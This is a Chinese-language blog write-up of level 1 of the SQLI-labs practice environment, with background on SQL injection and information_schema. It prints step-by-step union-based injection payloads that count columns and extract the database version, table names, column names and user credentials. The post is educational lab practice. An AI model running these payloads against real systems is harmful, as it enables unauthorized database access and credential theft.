SQLI_LAB------level 1
SQLI_LAB
刷题刷题刷题!!!
知识扩展:
SQL
1)SQL注入介绍
SQLI,sql injection,我们称之为 sql 注入。何为 sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL ,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用 sql 语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql 语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。
2)关于SQL基础语句
增:insert into tableName(columnName1,columnName2) values(value1,value2)
删:delete from tableName where …
改:update tableName set columnName=value where …
查:select * from tableName where …
3)Information_schema数据库基本表说明:
schemata表:提供了当前mysql实例中所有的数据库信息,show databases的结果就是从该表得出。
tables表:提供了关于数据库中的所有表的信息,即表属于哪个schema,表的创建时间、表的类型等,show tables from schemaName的结果就是从该表得出。
columns表:提供表中所有列信息,即表明了表中所有列及每列的信息,show columns from schemaName.tableName的结果就是从该表得出。
。。。。。。待续
less1
这是进去以后的主界面
下面开始进行简单测试
判断是否存在注入点
基础语句 and 1=1 、 and 1=2 判断 这里发现页面没什么变化。尝试测试 单引号 ‘
构造的语句:-1'
发现页面出现报错信息,判断页面存在get注入。
开始构造sql语句,查询字段数量。 通常使用order by 2........
构造的语句:-1'+order+by+3--+
通过不断测试发现当数字4时开始报错,说明数据库中有3个字段。
构造的语句:-1'+order+by+4--+
知道字段数以后,开始获取数据库版本,当前库名
构造的语句:-1'+union+select+1,version(),database()--+
得到版本、库名等信息以后,开始获取表名
构造的语句:-1'+union+select+1,group_concat(table_name),database()+from information_schema.tables+where+table_schema='security'--+
获取到表名以后,开始尝试获取字段名
构造语句:-1'+union+select+1,group_concat(column_name),database()+from information_schema.columns+where+table_name='users'--+
获取到字段名后,开始尝试获取字段内容
构造语句:-1'+union+select+1,group_concat(id,0x7e,username,0x3a,password),+3+from+users--+
但是这样有点乱,所以加个换行符 正常的话应该十六的进制的数但是呢没记住就直接写了
构造语句:-1'+union+select+1,group_concat(id,0x7e,username,0x3a,password,'<hr />'),+3+from+users--+
第一关完成。。。。。。
最新文章
- Activity之间传递参数(三)
- 使用 Knockout 扩展器扩展 observables
- PHP数组在HTML之中的应用
- [置顶] vb报表的设计
- delphi中覆盖最大化消息(WM_GETMINMAXINFO)
- UnitOfWork实战
- struct和typedef struct在c++中的用法
- ML—高斯判别分析
- ZJOI 2015 诸神眷顾的幻想乡
- Luogu P3412 仓鼠找$sugar$ $II$
- linux搭建
- Cannot connect to database because the database client
- VBA二次学习笔记(1)——文件操作
- re正则表达式方法
- TensorFlow saved_model 模块
- ANDROID开机动画分析
- OpenCV学习笔记之课后习题练习2-5
- XE6 任务栏 控件
- Apache 2.4 编码GB2312中文乱码的问题
- 背景半透明rgba最佳实践
热门文章
- office365激活码序列号密钥:
- Android Studio 配置Gradle
- Java并发编程(四):并发容器(转)
- python--脚本传参与shell脚本传参(位置参数)
- connection String加密
- RuntimeError: cuda runtime error (10) : invalid device ordinal
- 每个 JavaScript 开发者都该懂的 Unicode
- swoole 父子进程间通信
- Codeforces Global Round 4E(字符串,思维)
- nacos集群配置